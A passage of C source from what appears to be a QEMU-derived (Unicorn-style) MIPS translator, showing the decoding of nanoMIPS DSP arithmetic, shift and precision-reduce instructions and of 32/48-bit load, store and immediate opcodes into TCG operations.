v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* SUBQ_S_PH */ gen_helper_subq_s_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_SUBQH_R_PH: check_dsp_r2(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* SUBQH_PH */ gen_helper_subqh_ph(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* SUBQH_R_PH */ gen_helper_subqh_r_ph(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_SUBQH_R_W: check_dsp_r2(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* SUBQH_W */ gen_helper_subqh_w(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* SUBQH_R_W */ gen_helper_subqh_r_w(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_SUBU_S_QB: check_dsp(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* SUBU_QB */ gen_helper_subu_qb(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* SUBU_S_QB */ gen_helper_subu_s_qb(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_SUBU_S_PH: check_dsp_r2(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* SUBU_PH */ gen_helper_subu_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* SUBU_S_PH */ gen_helper_subu_s_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_SUBUH_R_QB: check_dsp_r2(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* SUBUH_QB */ gen_helper_subuh_qb(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* SUBUH_R_QB */ gen_helper_subuh_r_qb(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_SHLLV_S_PH: check_dsp(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* SHLLV_PH */ gen_helper_shll_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* SHLLV_S_PH */ gen_helper_shll_s_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_PRECR_SRA_R_PH_W: check_dsp_r2(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* PRECR_SRA_PH_W */ { TCGv_i32 sa_t = tcg_const_i32(tcg_ctx, rd); gen_helper_precr_sra_ph_w(tcg_ctx, v1_t, sa_t, v1_t, tcg_ctx->cpu_gpr[rt]); gen_store_gpr(tcg_ctx, v1_t, rt); tcg_temp_free_i32(tcg_ctx, sa_t); } break; case 1: /* PRECR_SRA_R_PH_W */ { TCGv_i32 sa_t = tcg_const_i32(tcg_ctx, rd); gen_helper_precr_sra_r_ph_w(tcg_ctx, v1_t, sa_t, v1_t, 
tcg_ctx->cpu_gpr[rt]); gen_store_gpr(tcg_ctx, v1_t, rt); tcg_temp_free_i32(tcg_ctx, sa_t); } break; } break; case NM_MULEU_S_PH_QBL: check_dsp(ctx); gen_helper_muleu_s_ph_qbl(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_MULEU_S_PH_QBR: check_dsp(ctx); gen_helper_muleu_s_ph_qbr(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_MULQ_RS_PH: check_dsp(ctx); gen_helper_mulq_rs_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_MULQ_S_PH: check_dsp_r2(ctx); gen_helper_mulq_s_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_MULQ_RS_W: check_dsp_r2(ctx); gen_helper_mulq_rs_w(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_MULQ_S_W: check_dsp_r2(ctx); gen_helper_mulq_s_w(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_APPEND: check_dsp_r2(ctx); gen_load_gpr(tcg_ctx, t0, rs); if (rd != 0) { tcg_gen_deposit_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, tcg_ctx->cpu_gpr[rt], rd, 32 - rd); } tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt]); break; case NM_MODSUB: check_dsp(ctx); gen_helper_modsub(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_SHRAV_R_W: check_dsp(ctx); gen_helper_shra_r_w(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_SHRLV_PH: check_dsp_r2(ctx); gen_helper_shrl_ph(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_SHRLV_QB: check_dsp(ctx); gen_helper_shrl_qb(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_SHLLV_QB: check_dsp(ctx); gen_helper_shll_qb(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_SHLLV_S_W: check_dsp(ctx); gen_helper_shll_s_w(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_SHILO: check_dsp(ctx); { TCGv tv0 = tcg_temp_new(tcg_ctx); TCGv tv1 = tcg_temp_new(tcg_ctx); int16_t imm = extract32(ctx->opcode, 16, 7); tcg_gen_movi_tl(tcg_ctx, tv0, rd >> 3); tcg_gen_movi_tl(tcg_ctx, tv1, imm); gen_helper_shilo(tcg_ctx, tv0, tv1, tcg_ctx->cpu_env); } break; case NM_MULEQ_S_W_PHL: check_dsp(ctx); gen_helper_muleq_s_w_phl(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_MULEQ_S_W_PHR: check_dsp(ctx); gen_helper_muleq_s_w_phr(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_MUL_S_PH: check_dsp_r2(ctx); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* MUL_PH */ gen_helper_mul_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case 1: /* MUL_S_PH */ gen_helper_mul_s_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; } break; case NM_PRECR_QB_PH: check_dsp_r2(ctx); gen_helper_precr_qb_ph(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_PRECRQ_QB_PH: check_dsp(ctx); gen_helper_precrq_qb_ph(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_PRECRQ_PH_W: check_dsp(ctx); gen_helper_precrq_ph_w(tcg_ctx, v1_t, v1_t, v2_t); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_PRECRQ_RS_PH_W: check_dsp(ctx); gen_helper_precrq_rs_ph_w(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_PRECRQU_S_QB_PH: 
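    /*
     * Added commentary, not in the original source: the PRECR/PRECRQ
     * helpers in this area pack halves of the two source registers into
     * narrower elements (e.g. paired halfwords into four bytes); the Q
     * variants take the most-significant halves and the _S/_RS forms
     * saturate (and round) the result.
     */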
check_dsp(ctx); gen_helper_precrqu_s_qb_ph(tcg_ctx, v1_t, v1_t, v2_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, ret); break; case NM_SHRA_R_W: check_dsp(ctx); tcg_gen_movi_tl(tcg_ctx, t0, rd); gen_helper_shra_r_w(tcg_ctx, v1_t, t0, v1_t); gen_store_gpr(tcg_ctx, v1_t, rt); break; case NM_SHRA_R_PH: check_dsp(ctx); tcg_gen_movi_tl(tcg_ctx, t0, rd >> 1); switch (extract32(ctx->opcode, 10, 1)) { case 0: /* SHRA_PH */ gen_helper_shra_ph(tcg_ctx, v1_t, t0, v1_t); gen_store_gpr(tcg_ctx, v1_t, rt); break; case 1: /* SHRA_R_PH */ gen_helper_shra_r_ph(tcg_ctx, v1_t, t0, v1_t); gen_store_gpr(tcg_ctx, v1_t, rt); break; } break; case NM_SHLL_S_PH: check_dsp(ctx); tcg_gen_movi_tl(tcg_ctx, t0, rd >> 1); switch (extract32(ctx->opcode, 10, 2)) { case 0: /* SHLL_PH */ gen_helper_shll_ph(tcg_ctx, v1_t, t0, v1_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, rt); break; case 2: /* SHLL_S_PH */ gen_helper_shll_s_ph(tcg_ctx, v1_t, t0, v1_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, rt); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_SHLL_S_W: check_dsp(ctx); tcg_gen_movi_tl(tcg_ctx, t0, rd); gen_helper_shll_s_w(tcg_ctx, v1_t, t0, v1_t, tcg_ctx->cpu_env); gen_store_gpr(tcg_ctx, v1_t, rt); break; case NM_REPL_PH: check_dsp(ctx); { int16_t imm; imm = sextract32(ctx->opcode, 11, 11); imm = (int16_t)(imm << 6) >> 6; if (rt != 0) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], dup_const(MO_16, imm)); } } break; default: generate_exception_end(ctx, EXCP_RI); break; } } static int decode_nanomips_32_48_opc(CPUMIPSState *env, DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint16_t insn; uint32_t op; int rt, rs, rd; int offset; int imm; insn = cpu_lduw_code(env, ctx->base.pc_next + 2); ctx->opcode = (ctx->opcode << 16) | insn; rt = extract32(ctx->opcode, 21, 5); rs = extract32(ctx->opcode, 16, 5); rd = extract32(ctx->opcode, 11, 5); op = extract32(ctx->opcode, 26, 6); switch (op) { case NM_P_ADDIU: if (rt == 0) { /* P.RI */ switch (extract32(ctx->opcode, 19, 2)) { case NM_SIGRIE: default: generate_exception_end(ctx, EXCP_RI); break; case NM_P_SYSCALL: if ((extract32(ctx->opcode, 18, 1)) == NM_SYSCALL) { generate_exception_end(ctx, EXCP_SYSCALL); } else { generate_exception_end(ctx, EXCP_RI); } break; case NM_BREAK: generate_exception_end(ctx, EXCP_BREAK); break; case NM_SDBBP: if (is_uhi(extract32(ctx->opcode, 0, 19))) { // gen_helper_do_semihosting(tcg_ctx, tcg_ctx->cpu_env); } else { if (ctx->hflags & MIPS_HFLAG_SBRI) { generate_exception_end(ctx, EXCP_RI); } else { generate_exception_end(ctx, EXCP_DBp); } } break; } } else { /* NM_ADDIU */ imm = extract32(ctx->opcode, 0, 16); if (rs != 0) { tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rs], imm); } else { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], imm); } tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt]); } break; case NM_ADDIUPC: if (rt != 0) { offset = sextract32(ctx->opcode, 0, 1) << 21 | extract32(ctx->opcode, 1, 20) << 1; target_long addr = addr_add(ctx, ctx->base.pc_next + 4, offset); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], addr); } break; case NM_POOL32A: switch (ctx->opcode & 0x07) { case NM_POOL32A0: gen_pool32a0_nanomips_insn(env, ctx); break; case NM_POOL32A5: { int32_t op1 = extract32(ctx->opcode, 3, 7); gen_pool32a5_nanomips_insn(ctx, op1, rd, rs, rt); } break; case NM_POOL32A7: switch (extract32(ctx->opcode, 3, 3)) { case NM_P_LSX: gen_p_lsx(ctx, rd, rs, rt); break; case NM_LSA: /* * In nanoMIPS, the shift field directly encodes the shift * 
amount, meaning that the supported shift values are in * the range 0 to 3 (instead of 1 to 4 in MIPSR6). */ gen_lsa(ctx, OPC_LSA, rd, rs, rt, extract32(ctx->opcode, 9, 2) - 1); break; case NM_EXTW: gen_ext(ctx, 32, rd, rs, rt, extract32(ctx->opcode, 6, 5)); break; case NM_POOL32AXF: gen_pool32axf_nanomips_insn(env, ctx); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_P_GP_W: switch (ctx->opcode & 0x03) { case NM_ADDIUGP_W: if (rt != 0) { offset = extract32(ctx->opcode, 0, 21); gen_op_addr_addi(ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[28], offset); } break; case NM_LWGP: gen_ld(ctx, OPC_LW, rt, 28, extract32(ctx->opcode, 2, 19) << 2); break; case NM_SWGP: gen_st(ctx, OPC_SW, rt, 28, extract32(ctx->opcode, 2, 19) << 2); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_P48I: { insn = cpu_lduw_code(env, ctx->base.pc_next + 4); target_long addr_off = extract32(ctx->opcode, 0, 16) | insn << 16; switch (extract32(ctx->opcode, 16, 5)) { case NM_LI48: check_nms(ctx); if (rt != 0) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], addr_off); } break; case NM_ADDIU48: check_nms(ctx); if (rt != 0) { tcg_gen_addi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt], addr_off); tcg_gen_ext32s_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[rt]); } break; case NM_ADDIUGP48: check_nms(ctx); if (rt != 0) { gen_op_addr_addi(ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[28], addr_off); } break; case NM_ADDIUPC48: check_nms(ctx); if (rt != 0) { target_long addr = addr_add(ctx, ctx->base.pc_next + 6, addr_off); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], addr); } break; case NM_LWPC48: check_nms(ctx); if (rt != 0) { TCGv t0; t0 = tcg_temp_new(tcg_ctx); target_long addr = addr_add(ctx, ctx->base.pc_next + 6, addr_off); tcg_gen_movi_tl(tcg_ctx, t0, addr); tcg_gen_qemu_ld_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, ctx->mem_idx, MO_TESL); tcg_temp_free(tcg_ctx, t0); } break; case NM_SWPC48: check_nms(ctx); { TCGv t0, t1; t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); target_long addr = addr_add(ctx, ctx->base.pc_next + 6, addr_off); tcg_gen_movi_tl(tcg_ctx, t0, addr); gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEUL); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } break; default: generate_exception_end(ctx, EXCP_RI); break; } return 6; } case NM_P_U12: switch (extract32(ctx->opcode, 12, 4)) { case NM_ORI: gen_logic_imm(ctx, OPC_ORI, rt, rs, extract32(ctx->opcode, 0, 12)); break; case NM_XORI: gen_logic_imm(ctx, OPC_XORI, rt, rs, extract32(ctx->opcode, 0, 12)); break; case NM_ANDI: gen_logic_imm(ctx, OPC_ANDI, rt, rs, extract32(ctx->opcode, 0, 12)); break; case NM_P_SR: switch (extract32(ctx->opcode, 20, 1)) { case NM_PP_SR: switch (ctx->opcode & 3) { case NM_SAVE: gen_save(ctx, rt, extract32(ctx->opcode, 16, 4), extract32(ctx->opcode, 2, 1), extract32(ctx->opcode, 3, 9) << 3); break; case NM_RESTORE: case NM_RESTORE_JRC: gen_restore(ctx, rt, extract32(ctx->opcode, 16, 4), extract32(ctx->opcode, 2, 1), extract32(ctx->opcode, 3, 9) << 3); if ((ctx->opcode & 3) == NM_RESTORE_JRC) { gen_compute_branch_nm(ctx, OPC_JR, 2, 31, 0, 0); } break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_P_SR_F: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_SLTI: gen_slt_imm(ctx, OPC_SLTI, rt, rs, extract32(ctx->opcode, 0, 12)); break; case NM_SLTIU: gen_slt_imm(ctx, OPC_SLTIU, rt, rs, extract32(ctx->opcode, 0, 
12)); break; case NM_SEQI: { TCGv t0 = tcg_temp_new(tcg_ctx); imm = extract32(ctx->opcode, 0, 12); gen_load_gpr(tcg_ctx, t0, rs); tcg_gen_setcondi_tl(tcg_ctx, TCG_COND_EQ, t0, t0, imm); gen_store_gpr(tcg_ctx, t0, rt); tcg_temp_free(tcg_ctx, t0); } break; case NM_ADDIUNEG: imm = (int16_t) extract32(ctx->opcode, 0, 12); gen_arith_imm(ctx, OPC_ADDIU, rt, rs, -imm); break; case NM_P_SHIFT: { int shift = extract32(ctx->opcode, 0, 5); switch (extract32(ctx->opcode, 5, 4)) { case NM_P_SLL: if (rt == 0 && shift == 0) { /* NOP */ } else if (rt == 0 && shift == 3) { /* EHB - treat as NOP */ } else if (rt == 0 && shift == 5) { /* PAUSE - treat as NOP */ } else if (rt == 0 && shift == 6) { /* SYNC */ gen_sync(tcg_ctx, extract32(ctx->opcode, 16, 5)); } else { /* SLL */ gen_shift_imm(ctx, OPC_SLL, rt, rs, extract32(ctx->opcode, 0, 5)); } break; case NM_SRL: gen_shift_imm(ctx, OPC_SRL, rt, rs, extract32(ctx->opcode, 0, 5)); break; case NM_SRA: gen_shift_imm(ctx, OPC_SRA, rt, rs, extract32(ctx->opcode, 0, 5)); break; case NM_ROTR: gen_shift_imm(ctx, OPC_ROTR, rt, rs, extract32(ctx->opcode, 0, 5)); break; } } break; case NM_P_ROTX: check_nms(ctx); if (rt != 0) { TCGv t0 = tcg_temp_new(tcg_ctx); TCGv_i32 shift = tcg_const_i32(tcg_ctx, extract32(ctx->opcode, 0, 5)); TCGv_i32 shiftx = tcg_const_i32(tcg_ctx, extract32(ctx->opcode, 7, 4) << 1); TCGv_i32 stripe = tcg_const_i32(tcg_ctx, extract32(ctx->opcode, 6, 1)); gen_load_gpr(tcg_ctx, t0, rs); gen_helper_rotx(tcg_ctx, tcg_ctx->cpu_gpr[rt], t0, shift, shiftx, stripe); tcg_temp_free(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, shift); tcg_temp_free_i32(tcg_ctx, shiftx); tcg_temp_free_i32(tcg_ctx, stripe); } break; case NM_P_INS: switch (((ctx->opcode >> 10) & 2) | (extract32(ctx->opcode, 5, 1))) { case NM_INS: check_nms(ctx); gen_bitops(ctx, OPC_INS, rt, rs, extract32(ctx->opcode, 0, 5), extract32(ctx->opcode, 6, 5)); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_P_EXT: switch (((ctx->opcode >> 10) & 2) | (extract32(ctx->opcode, 5, 1))) { case NM_EXT: check_nms(ctx); gen_bitops(ctx, OPC_EXT, rt, rs, extract32(ctx->opcode, 0, 5), extract32(ctx->opcode, 6, 5)); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_POOL32F: gen_pool32f_nanomips_insn(ctx); break; case NM_POOL32S: break; case NM_P_LUI: switch (extract32(ctx->opcode, 1, 1)) { case NM_LUI: if (rt != 0) { tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], sextract32(ctx->opcode, 0, 1) << 31 | extract32(ctx->opcode, 2, 10) << 21 | extract32(ctx->opcode, 12, 9) << 12); } break; case NM_ALUIPC: if (rt != 0) { offset = sextract32(ctx->opcode, 0, 1) << 31 | extract32(ctx->opcode, 2, 10) << 21 | extract32(ctx->opcode, 12, 9) << 12; target_long addr; addr = ~0xFFF & addr_add(ctx, ctx->base.pc_next + 4, offset); tcg_gen_movi_tl(tcg_ctx, tcg_ctx->cpu_gpr[rt], addr); } break; } break; case NM_P_GP_BH: { uint32_t u = extract32(ctx->opcode, 0, 18); switch (extract32(ctx->opcode, 18, 3)) { case NM_LBGP: gen_ld(ctx, OPC_LB, rt, 28, u); break; case NM_SBGP: gen_st(ctx, OPC_SB, rt, 28, u); break; case NM_LBUGP: gen_ld(ctx, OPC_LBU, rt, 28, u); break; case NM_ADDIUGP_B: if (rt != 0) { gen_op_addr_addi(ctx, tcg_ctx->cpu_gpr[rt], tcg_ctx->cpu_gpr[28], u); } break; case NM_P_GP_LH: u &= ~1; switch (ctx->opcode & 1) { case NM_LHGP: gen_ld(ctx, OPC_LH, rt, 28, u); break; case NM_LHUGP: gen_ld(ctx, OPC_LHU, rt, 28, u); break; } break; case NM_P_GP_SH: u &= ~1; switch (ctx->opcode & 1) { case NM_SHGP: gen_st(ctx, 
OPC_SH, rt, 28, u); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_P_GP_CP1: u &= ~0x3; switch (ctx->opcode & 0x3) { case NM_LWC1GP: gen_cop1_ldst(ctx, OPC_LWC1, rt, 28, u); break; case NM_LDC1GP: gen_cop1_ldst(ctx, OPC_LDC1, rt, 28, u); break; case NM_SWC1GP: gen_cop1_ldst(ctx, OPC_SWC1, rt, 28, u); break; case NM_SDC1GP: gen_cop1_ldst(ctx, OPC_SDC1, rt, 28, u); break; } break; default: generate_exception_end(ctx, EXCP_RI); break; } } break; case NM_P_LS_U12: { uint32_t u = extract32(ctx->opcode, 0, 12); switch (extract32(ctx->opcode, 12, 4)) { case NM_P_PREFU12: if (rt == 31) { /* SYNCI */ /* * Break the TB to be able to sync copied instructions * immediately. */ ctx->base.is_jmp = DISAS_STOP; } else { /* PREF */ /* Treat as NOP. */ } break; case NM_LB: gen_ld(ctx, OPC_LB, rt, rs, u); break; case NM_LH: gen_ld(ctx, OPC_LH, rt, rs, u); break; case NM_LW: gen_ld(ctx, OPC_LW, rt, rs, u); break; case NM_LBU: gen_ld(ctx, OPC_LBU, rt, rs, u); break; case NM_LHU: gen_ld(ctx, OPC_LHU, rt, rs, u); break; case NM_SB: gen_st(ctx, OPC_SB, rt, rs, u); break; case NM_SH: gen_st(ctx, OPC_SH, rt, rs, u); break; case NM_SW: gen_st(ctx, OPC_SW, rt, rs, u); break; case NM_LWC1: gen_cop1_ldst(ctx, OPC_LWC1, rt, rs, u); break; case NM_LDC1: gen_cop1_ldst(ctx, OPC_LDC1, rt, rs, u); break; case NM_SWC1: gen_cop1_ldst(ctx, OPC_SWC1, rt, rs, u); break; case NM_SDC1: gen_cop1_ldst(ctx, OPC_SDC1, rt, rs, u); break; default: generate_exception_end(ctx, EXCP_RI); break; } } break; case NM_P_LS_S9: { int32_t s = (sextract32(ctx->opcode, 15, 1) << 8) | extract32(ctx->opcode, 0, 8); switch (extract32(ctx->opcode, 8, 3)) { case NM_P_LS_S0: switch (extract32(ctx->opcode, 11, 4)) { case NM_LBS9: gen_ld(ctx, OPC_LB, rt, rs, s); break; case NM_LHS9: gen_ld(ctx, OPC_LH, rt, rs, s); break; case NM_LWS9: gen_ld(ctx, OPC_LW, rt, rs, s); break; case NM_LBUS9: gen_ld(ctx, OPC_LBU, rt, rs, s); break; case NM_LHUS9: gen_ld(ctx, OPC_LHU, rt, rs, s); break; case NM_SBS9: gen_st(ctx, OPC_SB, rt, rs, s); break; case NM_SHS9: gen_st(ctx, OPC_SH, rt, rs, s); break; case NM_SWS9: gen_st(ctx, OPC_SW, rt, rs, s); break; case NM_LWC1S9: gen_cop1_ldst(ctx, OPC_LWC1, rt, rs, s); break; case NM_LDC1S9: gen_cop1_ldst(ctx, OPC_LDC1, rt, rs, s); break; case NM_SWC1S9: gen_cop1_ldst(ctx, OPC_SWC1, rt, rs, s); break; case NM_SDC1S9: gen_cop1_ldst(ctx, OPC_SDC1, rt, rs, s); break; case NM_P_PREFS9: if (rt == 31) { /* SYNCI */ /* * Break the TB to be able to sync copied instructions * immediately. */ ctx->base.is_jmp = DISAS_STOP; } else { /* PREF */ /* Treat as NOP. 
*/ } break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_P_LS_S1: switch (extract32(ctx->opcode, 11, 4)) { case NM_UALH: case NM_UASH: check_nms(ctx); { TCGv t0 = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); gen_base_offset_addr(ctx, t0, rs, s); switch (extract32(ctx->opcode, 11, 4)) { case NM_UALH: tcg_gen_qemu_ld_tl(tcg_ctx, t0, t0, ctx->mem_idx, MO_TESW | MO_UNALN); gen_store_gpr(tcg_ctx, t0, rt); break; case NM_UASH: gen_load_gpr(tcg_ctx, t1, rt); tcg_gen_qemu_st_tl(tcg_ctx, t1, t0, ctx->mem_idx, MO_TEUW | MO_UNALN); break; } tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); } break; case NM_P_LL: switch (ctx->opcode & 0x03) { case NM_LL: gen_ld(ctx, OPC_LL, rt, rs, s); break; case NM_LLWP: check_xnp(ctx); gen_llwp(ctx, rs, 0, rt, extract32(ctx->opcode, 3, 5)); break; } break; case NM_P_SC: switch (ctx->opcode & 0x03) { case NM_SC: gen_st_cond(ctx, rt, rs, s, MO_TESL, false); break; case NM_SCWP: check_xnp(ctx); gen_scwp(ctx, rs, 0, rt, extract32(ctx->opcode, 3, 5), false); break; } break; case NM_CACHE: check_cp0_enabled(ctx); if (ctx->hflags & MIPS_HFLAG_ITC_CACHE) { gen_cache_operation(ctx, rt, rs, s); } break; } break; case NM_P_LS_E0: switch (extract32(ctx->opcode, 11, 4)) { case NM_LBE: check_eva(ctx); check_cp0_enabled(ctx); gen_ld(ctx, OPC_LBE, rt, rs, s); break; case NM_SBE: check_eva(ctx); check_cp0_enabled(ctx); gen_st(ctx, OPC_SBE, rt, rs, s); break; case NM_LBUE: check_eva(ctx); check_cp0_enabled(ctx); gen_ld(ctx, OPC_LBUE, rt, rs, s); break; case NM_P_PREFE: if (rt == 31) { /* case NM_SYNCIE */ check_eva(ctx); check_cp0_enabled(ctx); /* * Break the TB to be able to sync copied instructions * immediately. */ ctx->base.is_jmp = DISAS_STOP; } else { /* case NM_PREFE */ check_eva(ctx); check_cp0_enabled(ctx); /* Treat as NOP. */ } break; case NM_LHE: check_eva(ctx); check_cp0_enabled(ctx); gen_ld(ctx, OPC_LHE, rt, rs, s); break; case NM_SHE: check_eva(ctx); check_cp0_enabled(ctx); gen_st(ctx, OPC_SHE, rt, rs, s); break; case NM_LHUE: check_eva(ctx); check_cp0_enabled(ctx); gen_ld(ctx, OPC_LHUE, rt, rs, s); break; case NM_CACHEE: check_nms_dl_il_sl_tl_l2c(ctx); gen_cache_operation(ctx, rt, rs, s); break; case NM_LWE: check_eva(ctx); check_cp0_enabled(ctx); gen_ld(ctx, OPC_LWE, rt, rs, s); break; case NM_SWE: check_eva(ctx); check_cp0_enabled(ctx); gen_st(ctx, OPC_SWE, rt, rs, s); break; case NM_P_LLE: switch (extract32(ctx->opcode, 2, 2)) { case NM_LLE: check_xnp(ctx); check_eva(ctx); check_cp0_enabled(ctx); gen_ld(ctx, OPC_LLE, rt, rs, s); break; case NM_LLWPE: check_xnp(ctx); check_eva(ctx); check_cp0_enabled(ctx); gen_llwp(ctx, rs, 0, rt, extract32(ctx->opcode, 3, 5)); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; case NM_P_SCE: switch (extract32(ctx->opcode, 2, 2)) { case NM_SCE: check_xnp(ctx); check_eva(ctx); check_cp0_enabled(ctx); gen_st_cond(ctx, rt, rs, s, MO_TESL, true); break; case NM_SCWPE: check_xnp(ctx); check_eva(ctx); check_cp0_enabled(ctx); gen_scwp(ctx, rs, 0, rt, extract32(ctx->opcode, 3, 5), true); break; default: generate_exception_end(ctx, EXCP_RI); break; } break; } break; case NM_P_LS_WM: case NM_P_LS_UAWM: check_nms(ctx); { int count = extract32(ctx->opcode, 12, 3); int counter = 0; offset = sextract32(ctx->opcode, 15, 1) << 8 | extract32(ctx->opcode, 0, 8); TCGv va = tcg_temp_new(tcg_ctx); TCGv t1 = tcg_temp_new(tcg_ctx); MemOp memop = (extract32(ctx->opcode, 8, 3)) == NM_P_LS_UAWM ? MO_UNALN : 0; count = (count == 0) ? 
